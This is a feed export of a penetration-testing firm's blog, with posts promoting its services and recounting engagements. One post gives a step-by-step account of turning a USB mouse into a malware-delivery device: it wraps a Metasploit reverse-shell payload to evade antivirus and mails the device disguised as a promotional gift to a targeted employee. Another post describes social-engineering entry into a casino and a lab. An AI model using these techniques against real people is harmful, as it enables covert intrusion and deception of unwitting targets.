tag:blogger.com,1999:blog-4224774301348494382024-03-18T19:54:30.947-07:00Netragard's SNOsoft Research TeamThe Specialist in Anti-Hacking... delivering High Quality, Realistic Threat Network Penetration Testing services.Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.comBlogger67125tag:blogger.com,1999:blog-422477430134849438.post-28326305152544341172012-02-19T08:58:00.000-08:002014-07-12T19:03:35.453-07:00We've Moved!<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjecs_ypXeYx4N-glC5WMPWy3gU1SUjGeE3D1Gf31P5WfYaT6iMfP3MmSvUuN4ufhJYHvRGAz-nMG239HOomCS-b_TXJXtW67hX0ovRqisqf_c1JJGqsakSu86iKQh1aVetUwAtdsiu0F4/s1600/Screen+Shot+2012-02-19+at+12.02.03+PM.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 293px; height: 313px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjecs_ypXeYx4N-glC5WMPWy3gU1SUjGeE3D1Gf31P5WfYaT6iMfP3MmSvUuN4ufhJYHvRGAz-nMG239HOomCS-b_TXJXtW67hX0ovRqisqf_c1JJGqsakSu86iKQh1aVetUwAtdsiu0F4/s400/Screen+Shot+2012-02-19+at+12.02.03+PM.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5710893284058778722" /></a><br />This blog has moved to<a href="http://pentest.netragard.com"> http://pentest.netragard.com </a>.
<meta http-equiv="refresh" content="0; url=http://www.netragard.com/blog" />
<div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-9286426308397457522011-11-15T15:20:00.001-08:002011-11-15T15:20:50.918-08:00Netragard’s Badge of Honor (Thank you McAfee)<div class='posterous_autopost'><p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">Here at Netragard We Protect You From People Like Us™ and we mean it. We don’t just run automated scans, massage the output, and draft you a report that makes you feel good. That's what many companies do. Instead, we "hack" you with a methodology that is driven by hands on research, designed to create realistic and elevated levels of threat. Don’t take our word for it though; McAfee has helped us prove it to the world.</p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">Through their Threat Intelligence service, McAfee Labs listed Netragard as a “High Risk” due to the level of threat that we produced during a recent engagement. Specifically, we were using a beta variant of our custom Meterbreter malware (not to be confused with Metasploit’s Meterpreter) during an Advanced Penetration Testing engagement. The beta malware was identified and submitted to McAfee via our customers Incident Response process. The result was that McAfee listed Netragard as a “High Risk”, which caught our attention (and our customers attention) pretty quickly.</p> <div class="mceTemp mceIEcenter" style="text-align: center; font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;"><dl class="wp-caption aligncenter" style="margin-left: auto; margin-right: auto; background-color: #f3f3f3; padding-top: 4px; margin-top: 10px; margin-bottom: 10px; border-top-left-radius: 3px 3px; border-top-right-radius: 3px 3px; border-bottom-right-radius: 3px 3px; border-bottom-left-radius: 3px 3px; border: 1px solid #dddddd;"><dt class="wp-caption-dt"><a href="http://pentest.snosoft.com/2011/11/15/netragards-badge-of-honor-thank-you-mcafee/unknown/" rel="attachment wp-att-274"><img class="size-large wp-image-274" title="McAfee High Risk" src="http://pentest.snosoft.com/wp-content/uploads//2011/11/Unknown-1024x661.png" height="661" alt="McAfee Flags Netragard as a High Risk" style="border-color: initial; padding: 0px; margin: 0px;" width="1024" /></a></dt><dd class="wp-caption-dd" style="font-size: 11px; line-height: 17px; padding-top: 0px; padding-right: 4px; padding-bottom: 5px; padding-left: 4px; margin: 0px;">Badge of Honor</dd></dl></div> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">McAfee was absolutely right; we are “High Risk”, or more appropriately, "High Threat", which in our opinion is critically important when delivering quality Penetration Testing services. After all, the purpose of a Penetration Test (with regards to I.T security) is to identify the presence of points where a real threat can make its way into or through your IT Infrastructure. Testing at less than realistic levels of threat is akin to testing a bulletproof vest with a squirt gun.</p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">Netragard uses a methodology that’s been dubbed Real Time Dynamic Testing™ ("RTDT"). Real Time Dynamic Testing™ is a research driven methodology specifically designed to test the Physical, Electronic (networked and standalone) and Social attack surfaces at a level of threat that is slightly greater than what is likely to be faced in the real world. Real Time Dynamic Testing™ requires that our Penetration Testers be capable of reverse engineering, writing custom exploits, building and modifying malware, etc. In fact, the first rendition of our Meterbreter was created as a product of of this methodology.</p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">Another important aspect of Real Time Dynamic Testing™ is the targeting of attack surfaces individually or in tandem. The “<a href="http://pentest.snosoft.com/2011/06/24/netragards-hacker-interface-device-hid/" target="_blank">Netragard’s Hacker Interface Device</a>” article is an example of how Real Time Dynamic Testing™ was used to combine Social, Physical and Electronic attacks to achieve compromise against a hardened target. Another article titled “<a href="http://pentest.snosoft.com/2009/02/12/facebook-from-the-hackers-perspective/" target="_blank">Facebook from the hackers perspective</a>” provides an example of socially augmented electronic attacks driven by our methodology.</p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">It is important that we thank McAfee for two reasons. First we thank McAfee for responding to our request to be removed from the “High Risk” list so quickly because it was preventing our customers from being able to access our servers. Second and possibly more important, we thank McAfee for putting us on their “High Risk” list in the first place. The mere fact that we were perceived as a “High Risk” by McAfee means that we are doing our job right.</p> </p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-19860984556490170612011-06-24T09:51:00.001-07:002011-06-24T09:51:48.667-07:00Netragard's Hacker Interface Device (HID)<div class='posterous_autopost'><p><span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; line-height: 16px; font-size: 16px;"> <div class="post" style="margin-top: 0px; margin-right: 0px; margin-bottom: 30px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: #131313; color: #cccccc; line-height: 22px; padding: 0px; border: 1px solid #1f2223;"> <div class="entry" style="padding-top: 10px; padding-right: 20px; padding-bottom: 0px; padding-left: 20px; font-size: 13px; vertical-align: baseline; background-color: transparent; margin: 0px;"> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">We (<a href="http://www.netragard.com/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Netragard</a>) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services what so ever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">The first method of attack that people might think of when faced with a challenge like this is the use of the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug it in; when they do its game over,<a href="http://www.youtube.com/watch?v=rI-pct3zy18" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">they’re infected</a>. That trick worked great back in the day but not so much any more. The first issue is that most people are well aware of the USB stick threat due to the many published<a href="http://www.eetimes.com/electronics-news/4080241/Security-alert-Beware-of-USB-memory-sticks" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">articles about the subject</a>. The second is that more and more companies are pushing out group policies that disable the autorun feature in Windows systems. Those two things don’t eliminate the USB stick threat, but they certainly have a significant impact on its level of success and we wanted something more reliable.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Enter PRION, the evil HID.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;"><img class="aligncenter size-full wp-image-228" title="prion" src="http://pentest.snosoft.com/wp-uploads/2011/06/prion.png" height="345" alt="prion" style="margin-top: 0px; margin-right: auto; margin-bottom: 0px; margin-left: auto; font-size: 13px; vertical-align: baseline; background-color: transparent; display: block; padding: 0px;" width="454" /></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn’t composed of proteins but instead is composed of electronics which include a <a href="http://www.pjrc.com/teensy/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">teensy microcontroller</a>, a micro USB hub (small one from RadioShack), a mini USB cable (we needed the ends) a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a <a href="http://www.google.com/search?q=USB+toys&um=1&ie=UTF-8&tbm=isch&source=og&sa=N&hl=en&tab=wi&biw=1920&bih=1061" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">mouse, missile turret, dancing stripper, chameleon</a>, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">For the purposes of this engagement we choose to use a fancy <a href="http://www.google.com/search?q=logitech+mouse&hl=en&safe=off&authuser=0&biw=1920&bih=1061&prmd=ivnsr&source=lnms&tbm=isch&ei=qu4DTtuuA8W_gQfF1s20DQ&sa=X&oi=mode_link&ct=mode&cd=2&sqi=2&ved=0CBsQ_AUoAQ" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">USB logitech mouse</a> as our Hacker Interface Device / Attack Platform. To turn our logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step of course was to remove the screw from the bottom of the mouse and pop it open. Once we did that we disconnected the USB cable from the circuit board in the mouse and put that to the side. Then we proceed to use a drummel tool to shave away the extra plastic on the inside cover of the mouse. (There were all sorts of tabs that we could sacrifice). The removal of the plastic tabs was to make room for the new hardware.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Once the top of the mouse was gutted and all the unnecessary parts removed we began to focus on the USB hub. The first thing we had to do was to extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn’t want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out from the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small bic lighter.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was to take the mini USB cable, cut one of the ends off leaving about 1 inch of wire near the connector. Then we stripped all plastic off of the connector and stripped a small amount of wire from the 4 internal wires. We soldered those four wires to the USB board making sure to follow the<a href="http://pinouts.ru/Slots/USB_pinout.shtml" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">right pinout pattern</a>. This is the cable that will plug into the teensy mini USB port when we insert the teensy microcontroller.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Once that was finished we took the USB cable that came with the mouse and cut the circuit board connector off of the end leaving 2 inchs of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub making sure to follow the right pinout patterns mentioned above. This is an important cable as its the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">At this point we have three cables soldered to the USB hub. Just to recap those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the teensy device. The next and most challenging part of this is to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn’t soldered on properly then we won’t be able to store our malware on the drive and the the attack would be mostly moot. ( We say mostly because we could still instruct the mouse to fetch the malware from a website, but that’s not covert.)</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB connector that we stole the end from previously. We stripped the ends of the wires in the cable and carefully soldered the ends to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving us the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape as to avoid any shorts. Once everything was we plugged in we tested the devices. The USB drive mounted, the teensy card was programmable, and the mouse worked.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Time to give prion the ability to infect…</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">We learned that the client was using Mcafee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren’t allowed to use social networks for social engineering but we certainly were allowed to do reconnaissance against social networks. With Mcafee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to <a href="http://www.metasploit.com/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Metasploit</a> because we love the functionality, we also wanted the capabilities provided by <a href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">meterpreter</a>, but we needed more than that. We needed our malware to be fully undetectable and to subvert the “Do you want to allow this connection” dialogue box entirely. You can’t do that with encoding…</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">To make this happen we created a meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up and injected it into our own wrapper of sorts. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and to evade detection by Mcafee. When we ran our tests on a machine running Mcafee, the malware ran without a hitch. We should point out that our ability to evade Mcafee isn’t any indication of quality and that we can evade any Antivirus solution using similar custom attack methodologies. After all, its impossible to detect something if you don’t know what it is that you are looking for (It also helps to have a team of researchers at our disposal).</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Once we had our malware built we loaded it onto the flash drive that we soldered into our mouse. Then we wrote some code for the teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from <a href="http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Adrian Crenshaw’s website</a> who deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;"><strong style="font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">Usage:</strong> Plug mouse into computer, get pwned.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">The last and final step here was to ship the mouse to our customer. One of the most important aspects of this was to repack the mouse in its original package so that it appeared unopened. Then we used <a href="http://www.jigsaw.com/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Jigsaw</a> to purchase a list of our client’s employes. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse and made it look like a promotional gadget, added fake marketing flyers, etc. then shipped the mouse. Sure enough, three days later the mouse called home.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;"><img class="aligncenter size-full wp-image-231" title="pwned" src="http://pentest.snosoft.com/wp-uploads/2011/06/pwned.png" height="267" alt="pwned" style="margin-top: 0px; margin-right: auto; margin-bottom: 0px; margin-left: auto; font-size: 13px; vertical-align: baseline; background-color: transparent; display: block; padding: 0px;" width="885" /></p> <div class="twitterbutton" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 5px; font-size: 13px; vertical-align: baseline; background-color: transparent; float: right; margin: 0px;"><iframe scrolling="no" src="http://platform0.twitter.com/widgets/tweet_button.html?_=1308933258950&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fpentest.snosoft.com%2F2011%2F06%2F24%2Fnetragards-hacker-interface-device-hid%2F&related=greybrimstone%3APenetration%20Testing&text=Netragard%E2%80%99s%20Hacker%20Interface%20Device%20(HID).&url=http%3A%2F%2Fpentest.snosoft.com%2F2011%2F06%2F24%2Fnetragards-hacker-interface-device-hid%2F&via=Netragard" frameborder="0"></iframe></div> <p /> </div> </div> </span></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com2tag:blogger.com,1999:blog-422477430134849438.post-57949974579294039152011-02-25T11:40:00.001-08:002011-02-25T11:40:13.202-08:00Netragard Signage Snatching<div class='posterous_autopost'><p> <p>Recently Netragard has had a few discussions with owners and operators of sports arenas, with the purpose of identifying methods in which a malicious hacker could potentially disrupt a sporting event, concert, or other large scale and highly visible event.</p> <p>During the course of the these conversations, the topic of discussion shifted from network exploitation to social engineering, with a focus on compromise of the digital signage systems. Until recently, even I hadn’t thought about how extensively network controlled signage systems are used in facilities like casinos, sports arenas, airports, and roadside billboards. That is, until our most recent casino project.</p> <p>Netragard recently completed a Network Penetration Test and Social Engineering Test for a large west coast casino, with spectacular results. Not only were our engineers able to gain the keys to the kingdom, they were also able to gain access to the systems that had supervisory control for every single digital sign in the facility. Some people may think to themselves, “ok, what’s the big deal with that?”. The answer is simple: Customer perception and corporate image.</p> <p>Before I continue on, let me provide some background; Early in 2008, there were two incidents in California where two on-highway digital billboards were compromised, and their displays changed from the intended display. While both of these incidents were small pranks in comparison to what they could have done, the effect was remembered by those who drove by and saw the signs. (<a href="http://pentest.netragard.com/%3Ehttp://billboardliberation.com/HQ.html" target="_blank">Example A</a>, <a href="http://www.engadget.com/2008/03/25/clear-channel-digital-billboards-in-socal-hax0r3d/" target="_blank">Example B</a>)</p> <p>Another recent billboard hack in Moscow, Russia, wasn’t as polite as the pranksters in California. A hacker was able to gain control of a billboard in downtown Moscow (worth noting, Moscow is the 7th largest city in the world), and after subsequently gaining access, looped a video clip of pornographic material. (<a href="http://www.cbsnews.com/stories/2010/01/15/world/main6100772.shtml" target="_blank">Example C</a>) Imagine if this was a sports organization, and this happened during a major game.</p> <p>Brining this post back on track, let’s refocus on the casino and the potential impact of signage compromise. After spending time in the signage control server, we determined that there were over 40 unique displays available to control, some of which were over 100″ in display size. WIth customer permission, we placed a unique image on a small sign for proof of concept purposes (go google “stallowned”). This test, coupled with an impact audit, clearly highlighted to the casino that ensuring the security of their signage systems was nearly as paramount to securing their security systems, cage systems, and domain controllers. All the domain security in the world means little to a customer if they’re presented with disruptive material on the signage during their visit to the casino. A compromise of this nature could cause significant loss or revenue, and cause a customer to never re-visit the casino.</p> <p>I also thought it pertinent for the purpose of this post to share another customer engagement story. This story highlights how physical security can be compromised by a combination of social engineering and network exploitation, thus opening an additional risk vector that could allow for compromise of the local network running the digital display systems.</p> <p>Netragard was engaged by a large bio-sciences company in late 2010 to assess the network and physical security of multiple locations belonging to a business unit that was a new acquisition. During the course of this engagement, Netragard was able to take complete control of their network infrastructure remotely, as is the case in most of our engagements. More so, our engineers were able to utilize the social engineering skills and “convince” the physical site staff to grant them building access. Once passing this first layer of physical access, by combining social and network exploitation, they were subsequently able to gain access to sensitive labs and document storage rooms. These facilities/rooms were key to the organizations intellectual property, and on-going research. Had our engineers been hired by a competing company or other entity, there would have been a 100% chance that the IP (research data, trials data, and so forth) could have been spirited off company property and into hands unknown.</p> <p>By combining network exploitation and social engineering, we’ve postulated to the sports arena operators that Netragard has a high probability of gaining access to the control systems for their digital signage. Inevitably, during these discussions the organizations push back stating that their facilities have trained security staff and access control systems. To that we inform them that the majority of sports facilities staff are more attuned to illicit access attempts in controlled areas, but only during certain periods of operation, such as active games, concerts, and other large scale events. During non-public usage hours though, there’s a high probability that a skilled individual could gain entry to access controlled areas during a private event, or through beach of trust, such as posing as a repair technician, emergency services employee, or even a facility employee.</p> <p>One area of concern for any organization, whether they be a football organization, Fortune 100 company, or a mid-size business, is breach of trust with their consumer base. For a major sports organization, the level of national exposure and endearment far exceeds the exposure most Netragard customers have to the public. Because of this extremely high national exposure, a sports organization and its arena are a prime target for those who may consider highly visible public disruption of games a key tool in furthering an socio-political agenda. We’re hopeful that these organizations will continue to take a more serious stance to ensure that their systems and public image are as protected as possible.</p> </p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-57755397870007691352011-02-22T19:43:00.001-08:002011-02-25T07:44:08.975-08:00Quality Penetration Testing by Netragard<div class="posterous_autopost"><p>The purpose of <a href="http://www.netragard.com/" title="Penetration Testing" target="_blank">Penetration Testing</a> is to identify the presence of points where an external entity can make its way into or through a protected entity. <a href="http://www.netragard.com/" title="Penetration Testing" target="_blank">Penetration Testing</a> is not unique to IT security and is used across a wide variety of different industries. For example, Penetration Tests are used to assess the effectiveness of body armor. This is done by exposing the armor to different munitions that represent the real threat. If a projectile penetrates the armor then the armor is revised and improved upon until it can endure the threat.</p> <p><img class="aligncenter" src="http://www.netragard.com/images/img.png" height="284" alt="" width="463" /></p> <p><img alt="" src="" /></p> <p>Network Penetration Testing is a class of Penetration Testing that applies to Information Technology. The purpose of Network Penetration Testing is to identify the presence of points where a threat (defined by the hacker) can align with existing risks to achieve penetration. The accurate identification of these points allows for remediation.</p> <p>Successful penetration by a malicious hacker can result in the compromise of data with respect to Confidentiality, Integrity and Availability (“CIA”). In order to ensure that a Network Penetration Test provides an accurate measure of risk (<strong><span style="color: #ff0000;">risk = probability x impact</span></strong>) the test must be delivered at a threat level that is slightly elevated from that which is likely to be faced in the real world. Testing at a lower than realistic threat level would be akin to testing a bulletproof vest with a squirt gun.</p> <p>Threat levels can be adjusted by adding or removing attack classes. These attack classes are organized under three top-level categories, which are Network Attacks, Social Attacks, and Physical Attacks. Each of the top-level categories can operate in a standalone configuration or can be used to augment the other. For example, Network Penetration Testing with Social Engineering creates a significantly higher level of threat than just Network Penetration Testing or Social Engineering alone. Each of the top-level threat categories contains numerous individual attacks.</p> <p>A well-designed Network Penetration Testing engagement should employ the same attack classes as a real threat. This ensures that testing is realistic which helps to ensure effectiveness. All networked entities face threats that include Network and Social attack classes. Despite this fact, most Network Penetration Tests entirely overlook the Social attack class and thus test at radically reduced threat levels. Testing at reduced threat levels defeats the purpose of testing by failing to identify the same level of risks that would likely be identified by the real threat. The level of threat that is produced by a Network Penetration Testing team is one of the primary measures of service quality.</p> <p> </p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-81231858027836917352011-01-25T17:23:00.001-08:002011-02-25T07:44:32.454-08:00Netragard Challenges your PCI Compliance<div class="posterous_autopost"><p><span style=" line-height: 22px;font-family:Lucida Grande, Arial, Helvetica, sans-serif;color:#cccccc;"> </span></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">The purpose of legitimate Network Penetration Testing is to positively identify risks in a targeted IT Infrastructure before those risks are identified and exploited by malicious hackers. This enables the IT managers to remediate against those risks before they become an issue. To accomplish this the Penetration Test must be driven by people with at least the same degree of skill and persistence as the threat (defined by the malicious hacker). If the Penetration Test is delivered with a skill set that is less than that of the real threat then the test will likely be ineffective. This would be akin to testing the effectiveness a bullet-proof vest with a squirt gun.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">Unfortunately most penetration tests don’t test at realistic threat levels. This is especially true with regards to PCI based penetration tests. Most PCI based penetration testing companies do the bare minimum required to satisfy PCI requirement 11.3. This is problematic because it results in businesses passing their PCI penetration tests when they should have failed and it promotes a false sense of security. The truth is that most businesses that pass their annual PCI audits are still relatively easy to hack. </span><span class="Apple-style-span" style="color:#FF9966;">If you don’t believe us then </span><a href="http://www.netragard.com/landing-page/pci-compliance-testing-offer.html" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><strong style=" vertical-align: baseline; background- padding: 0px; margin: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FF9966;">let us prove it and hire us (Netragard) to deliver a conditional penetration test</span></strong></a><span class="Apple-style-span" style="color:#FF9966;">.</span><span class="Apple-style-span" style="color:#FFFFFF;"> If we can’t penetrate your network using our unrestricted, advanced methodology then the next test is free. </span><strong style=" vertical-align: baseline; background- padding: 0px; margin: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">(Challenge ends March, 31st 2011).</span></strong></p> <p></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com2tag:blogger.com,1999:blog-422477430134849438.post-20838468808476605322011-01-16T17:07:00.001-08:002011-02-25T07:45:55.657-08:00Netragard: Connect to Chaos<div class="posterous_autopost"><p><span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; color: #cccccc; line-height: 22px;"> </span></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">The <a href="http://www.chevrolet.com/volt/" title="Chevy Volt" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Chevy Volt</a> will be the first car of its type: not because it is a hybrid electric/petrol vehicle, but because GM plans to give each one the company sells its own IP address. The Volt will have no less than 100 microcontrollers running its systems from some 10 million lines of code. This makes some hackers very excited and Adriel Desautels, president of security analysis firm<a href="http://www.netragard.com/" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Netragard</a>, very worried. Before now, you needed physical access to reprogram the software inside a car: an ‘air gap’ protected vehicles from remote tampering. The Volt will have no such physical defence. Without some kind of electronic protection, Desautels sees cars such as the Volt and its likely competitors becoming ‘hugely vulnerable 5000lb pieces of metal’.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Desautels adds: “We are taking systems that were not meant to be exposed to the threats that my team produces and plug it into the internet. Some 14 year old kid will be able to attack your car while you’re driving.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">…</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;"><strong style="font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">The full article can be found </strong><a href="http://www.newelectronics.co.uk/article/30523/Technology-Watch-Connect-to-chaos.aspx" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;"><strong style="font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">here</strong></a><strong style="font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">.</strong></p> <p></p></div><div 